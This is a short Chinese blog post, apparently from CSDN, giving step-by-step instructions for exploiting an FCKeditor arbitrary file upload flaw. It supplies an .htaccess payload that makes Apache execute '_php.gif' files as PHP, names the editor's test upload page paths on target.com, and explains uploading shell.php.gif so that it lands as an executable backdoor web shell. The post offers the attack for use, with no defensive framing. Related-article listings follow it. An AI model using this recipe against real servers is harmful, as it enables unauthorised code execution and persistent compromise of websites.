fckeditor任意文件上传漏洞

最新推荐文章于 2024-05-14 03:24:06 发布
最新推荐文章于 2024-05-14 03:24:06 发布
阅读量6.2k 收藏 3
点赞数
分类专栏: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u012684933/article/details/19972737
版权

1. 创建.htaccess文件,内容如下:

<FilesMatch "_php.gif">
SetHandler application/x-httpd-php
</FilesMatch>

.htaccess文件可以用来设置某个目录和某个目录的子目录的权限,以上内容的意思是将扩展名是"_php.gif"的文件解析成php


2.使用如下url,上传上面创建的的.htaccess文件
http://target.com/FCKeditor/editor/filemanager/upload/test.html
http://target.com/FCKeditor/editor/filemanager/browser/default/connectors/test.html

通过这一步上传,上传目录的"_php.gif"文件apache会按照php文件解析



3.上传shell.php.gif文件
这一步还是使用如下url:
http://target.com/FCKeditor/editor/filemanager/upload/test.html
http://target.com/FCKeditor/editor/filemanager/browser/default/connectors/test.html
shell.php.gif文件被上传后,自动更名为shell_php.gif,shell_php.gif文件就是后门文件

4.访问shell_php.gif,则可以,shell执行


heayin123
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
fckeditor上传文件配置
笨笨的专栏
07-06 1432
配置fckeditor上传(php为例)
30.文件上传漏洞、编辑器漏洞和IIS高版本漏洞及防御(三)1
08-03
文件上传漏洞、编辑器漏洞和IIS高版本漏洞及防御(三)1 本文是作者的网络安全自学教程系列的一部分,主要关注的是如何理解和防范网络安全中的某些常见漏洞。作者强调反对利用这些知识进行非法活动,鼓励读者以保护...
fckeditor漏洞_三十,文件上传漏洞、编辑器漏洞和IIS高版本漏洞及防御
qq_50854662的博客
11-08 4733
fckeditor漏洞_三十,文件上传漏洞、编辑器漏洞和IIS高版本漏洞及防御
fckeditor 漏洞php,FCKeditor connector.php任意文件上传漏洞
weixin_36358109的博客
03-11 521
BUGTRAQ ID: 31812CVE(CAN) ID: CVE-2008-6178FCKeditor是一款开放源码的HTML文本编辑器。FCKeditor的editor/filemanager/browser/default/connectors/php/connector.php模块中存在文件上传限制漏洞:147. function FileUpload( $resourceType...
2024年【渗透测试】--- FCKeditor文本编辑器漏洞_ckeditor漏洞,保洁阿姨看完都会了
最新发布
2401_85013604的博客
05-14 628
迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
FCKeditor 2.6.4 php版本任意文件上传——漏洞复现
W小哥
06-17 7386
一、漏洞描述 FCKeditor是目前最优秀的可见即可得网页编辑器之一,它采用JavaScript编写。具备功能强大、配置容易、跨浏览器、支持多种编程语言、开源等特点。它非常流行,互联网上很容易找到相关技术文档,国内许多Web项目和大型网站均采用了FCKeditor。 Fckeditor 低于 2.6.4 php 版本任意文件上传漏洞,当您的PHP环境配置为 GPC = Off 时可绕过currentfolder参数过滤上传脚本木马控制网站服务器 二、漏洞原理 漏洞版本:<=2.6.4 三、环境搭建
FCKEditor粘贴图片自动上传到服务器(Java版)
Mr_Zang666的博客
04-11 203
if (navigator.userAgent.match(/Trident/i) && navigator.userAgent.match(/MSIE 8.0/i)) { //判断浏览器内核是否为Trident内核IE8.0。// 当数据包大小不是数据单元的整数倍时,读取最后剩余的小于数据单元的所有数据。// 忽略简单form字段而不是上传域的文件域(等)然后访问http://localhost:8088/ueditor/ 就可以测试了。
asp不能上传超过50k文件_FCKeditor文件上传漏洞及利用
weixin_39551103的博客
11-24 152
关于FCKeditor攻击思路总结一. 关于FCKeditorFCKeditor是一个网页的文本编辑器,在很多的cms里都有出现。近日工作期间遇到了不下十个有FCKeditor的站,尤其是ZF网站。本文简单介绍通过FCKeditor上传漏洞进行攻击的思路,并对可能用到的操作进行整理。二. 攻击思路1.查看FCKeditor版本12http://127.0.0.1/fckeditor/ed...
FCKeditor connector.php任意文件上传漏洞
cnbird's blog
02-22 5258
http://www.sebug.net/exploit/5799/FCKeditor是一款开放源码的HTML文本编辑器。FCKeditor的editor/filemanager/browser/default/connectors/php/connector.php模块中存在文件上传限制漏洞:    147.    function FileUpload( $resourceType, $c
fckeditor编辑器上传——含有点变成下划线限制的源码包
12-08
5. **文件上传漏洞**:文件上传漏洞通常是指攻击者能够通过上传恶意文件来获取服务器的控制权,执行任意代码,或者破坏网站内容。在这个场景中,由于Fckeditor的限制不严,攻击者可能能上传带有特殊字符或者扩展名的...
fckeditor2.66精简修正版(修正最新上传漏洞ASP版)
05-23
在Fckeditor 2.66中,这个漏洞使得未经验证的用户有可能上传任意文件到服务器,从而对网站的安全构成威胁。为了防止这种情况,开发者发布了这个修正版,加强了文件上传的验证机制,限制了非法文件的上传,提升了系统...
FCKeditor上传漏洞与IIS6解析漏洞的利用和修补
03-18
FCKeditor上传漏洞与IIS6解析漏洞的利用和修补
常用网页编辑器漏洞手册(全面版)fckeditor,ewebeditor
10-28
EWebEditor的漏洞信息没有在提供的内容中详细列出,但通常来说,网页编辑器可能存在的漏洞包括XSS(跨站脚本攻击)、CSRF(跨站请求伪造)以及文件上传漏洞等。攻击者可能利用这些漏洞在用户浏览器中执行恶意代码,...
fckeditor的0DAY
10-22
fckeditor的0DAYfckeditor的0DAY
FCKeditor所有版本任意文件上传缺陷
weixin_30416871的博客
09-04 179
In The Name Of GOD[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability[+] Date: 2011[+] script:http://sourceforge.net/projects/fckeditor/[+] Author: pentesters.ir[+] Website : WwW.Pen...
FCKeditor 2.4.3文件上传漏洞 ——合天网安实验室学习笔记
weixin_42582241的博客
02-22 2807
实验链接 FCKeditor是一款开放源码的文本编辑器,其2.4.3版本upload.php文件使用黑名单进行文件校验,通过实验学习如何绕过黑名单检测,上传恶意文件。 链接:http://www.hetianlab.com/expc.do?ce=374758bd-360d-44ac-8db5-a60ac5c25866 实验简介 实验所属系列: Web安全 实验对象: 本科/专科信息安全专业 相关课...
UEditor编辑器两个版本任意文件上传漏洞分析
10-13 3391
前言 UEditor是一款所见即所得的开源富文本编辑器,具有轻量、可定制、用户体验优秀等特点,被广大WEB应用程序所使用。本次爆出的高危漏洞属于.NET版本,其它的版本暂时不受影响。漏洞成因是在抓取远程数据源的时候未对文件后缀名做验证导致任意文件写入漏洞,黑客利用此漏洞可以在服务器上执行任意指令,综合评级高危。由于时间仓促,本文分析不到位的地方还请多多谅解。 IT资源论坛:www.euei.com...
CKEditor 历史漏洞复现:CVE-2014-5191(无Poc)
soldi_er的博客
10-27 6724
文章目录选择测试版本 4.4.2安装 2015 年发布版本 4.4.2npm 安装 - 未成功bower 安装 - 成功页面引用 CKEditor寻找并测试漏洞 选择测试版本 4.4.2 根据官方公告的漏洞修复情况来看,第一个选择最好是 4.4.2。 安装 2015 年发布版本 4.4.2 npm 安装 - 未成功 访问 CKEditor 4 官方指南,查看 [Getting Started]模块。 新建 down-test 目录,测试不同命令的安装结果。 npm 安装命令 执行结果 npm
Fckeditor漏洞利用全面解析
weixin_34413802的博客
06-27 518
第一步:查看编辑器版本 FCKeditor/_whatsnew.html ————————————————————————————— 第二步. Version 2.2 版本 Apache+linux 环境下在上传文件后面加个.突破!测试通过。 ————————————————————————————— 第三步.Version <=2.4.2 For php ...
FCKeditor文件上传漏洞及利用-File-Upload-Vulnerability-in-FCKEditor1
08-03
"FCKeditor文件上传漏洞及利用-File-Upload-Vulnerability-in-FCKEditor1" FCKeditor(现称为CKeditor)是CKSource公司的一款开源的所见即所得(WYSIWYG)文本编辑器,可以集成到网络应用中,为用户提供类似文字...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值